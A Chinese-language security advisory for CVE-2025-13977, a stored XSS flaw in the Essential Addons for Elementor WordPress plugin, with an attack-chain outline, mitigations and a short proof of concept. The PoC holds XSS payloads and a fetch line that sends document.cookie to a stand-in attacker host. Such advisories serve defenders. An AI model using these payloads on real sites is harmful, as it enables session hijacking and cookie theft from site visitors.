CVE-2025-13977 WordPress Essential Addons插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-13977

漏洞类型

存储型跨站脚本攻击(XSS)

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Essential Addons for Elementor WordPress插件

漏洞概述

Essential Addons for Elementor是一款流行的WordPress Elementor页面构建器扩展插件，提供丰富的模板和小组件。该插件在6.5.3及以下版本中存在存储型跨站脚本(XSS)漏洞，攻击者可利用Event Calendar组件的自定义属性处理和Image Masking模块的元素ID渲染功能注入恶意JavaScript代码。由于插件在处理用户输入时未进行充分的输入清理和输出转义，攻击者只需拥有Contributor（贡献者）级别权限即可在页面中注入恶意脚本。当其他用户访问包含恶意代码的页面时，脚本会自动执行，可能导致会话劫持、敏感信息窃取或管理权限滥用等严重后果。该漏洞影响所有使用该插件的WordPress网站，CVSS评分为6.4，属于中危级别。

技术细节

漏洞主要存在于两个模块中：1) Event Calendar widget的自定义属性处理功能，攻击者可在事件属性中注入恶意脚本；2) Image Masking模块的元素ID渲染功能，在处理元素ID时未进行适当的输出转义。攻击者利用这两个入口点，将包含<script>标签或事件处理器(如onerror、onload)的JavaScript代码注入到页面中。由于插件在保存数据时未对特殊字符进行清理，且在输出时未进行HTML实体转义，导致恶意代码被浏览器作为有效脚本执行。攻击成功后，恶意代码会在所有访问该页面的用户浏览器中执行，可窃取cookies、伪造请求或执行其他恶意操作。由于WordPress的 Contributor角色本身就具有创建和编辑帖子的权限，攻击门槛相对较低。

攻击链分析

STEP 1

信息收集

攻击者识别目标网站使用的WordPress版本和Essential Addons for Elementor插件版本，确认版本≤6.5.3

STEP 2

权限获取

攻击者获取WordPress Contributor账户或通过社会工程学手段获取具有贡献者权限的账户凭据

STEP 3

漏洞利用准备

攻击者在Event Calendar组件的自定义属性或Image Masking模块的元素ID中构造恶意XSS payload

STEP 4

恶意代码注入

通过Elementor编辑器或REST API将包含XSS payload的内容保存到数据库，payload被持久化存储

STEP 5

触发执行

当其他用户访问包含恶意代码的页面时，浏览器解析HTML并执行注入的JavaScript脚本

STEP 6

攻击成功

攻击者通过XSS成功窃取用户会话cookie、劫持账户或执行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-13977 PoC - Stored XSS in Essential Addons for Elementor
// Requires Contributor-level access or higher

// Method 1: Event Calendar Widget Custom Attributes
const eventCalendarPayload = {
    post_id: 123,
    widget_settings: {
        ea_event_calendar: true,
        custom_attributes: [
            { attribute: 'onerror', value: "alert(document.cookie)" },
            { attribute: 'onload', value: "fetch('https://attacker.com/steal?c='+document.cookie)" }
        ]
    }
};

// Method 2: Image Masking Module Element ID
const imageMaskingPayload = {
    post_id: 123,
    widget_settings: {
        ea_image_masking: true,
        masked_image_id: 'test"><script>alert("XSS")</script>',
        element_id: 'malicious\" onfocus=\"alert(1)\" autofocus x=\"'
    }
};

// Exploit: Inject via WordPress REST API or Elementor editor
fetch('/wp-json/wp/v2/posts/123', {
    method: 'POST',
    headers: {
        'Content-Type': 'application/json',
        'X-WP-Nonce': wpNonce
    },
    body: JSON.stringify({
        content: '[ea-event-calendar]' + JSON.stringify(eventCalendarPayload) + '[/ea-event-calendar]'
    })
});

影响范围

Essential Addons for Elementor ≤ 6.5.3

防御指南

临时缓解措施

在官方补丁发布前，可采取以下临时缓解措施：1) 临时禁用Event Calendar和Image Masking组件；2) 限制或禁用低权限用户的帖子发布功能；3) 部署Web应用防火墙(WAF)规则过滤恶意XSS payload；4) 加强对高权限账户的多因素认证；5) 定期审计网站内容和用户权限配置。